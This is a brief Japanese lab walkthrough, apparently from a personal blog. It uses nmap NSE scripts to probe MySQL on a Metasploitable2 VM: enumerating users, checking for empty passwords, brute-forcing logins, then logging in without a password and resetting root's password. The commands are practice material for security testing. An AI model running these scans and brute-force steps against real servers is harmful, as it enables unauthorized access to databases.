Hello there, ('ω')ノ
まずは、mysqlのスクリプトの列挙を。
ls -al /usr/share/nmap/scripts/ | grep -e "mysql"
今回もターゲットは、Metasploitable2で。
バージョンやソルトの情報を。
nmap -p 3306 --script mysql-info 10.4.128.81
次にユーザの列挙を。
nmap -p 3306 --script mysql-enum 10.4.128.81
パスワードなしをチェックすると。
rootのパスワードは、空らしく。
nmap -p 3306 --script mysql-emty-password 10.4.128.81
さっそく、rootでログインいしょうとするとアクセスできなくて。
なので再度、スレッドを増やしてみると。
rootのほかにguestも。
nmap -T4 -p 3306 --script mysql-brute --script-args mysql-brute.threads=100 10.4.128.81
nmapの様子をWiresharkで確認すると。
rootのレスポンスがOKで。
guestのレスポンスもOKで。
CLIからだとrootもguestもパスワードなしでログイン可能で。
mysql -u root -h 10.4.128.81
mysql -u guest -h 10.4.128.81
とりあえず、guestでログインして。
rootのパスワードを123に設定すると。
無事にrootでログインできた。
パスワードが暗号化されて保存されていた。
Best regards, (^^ゞ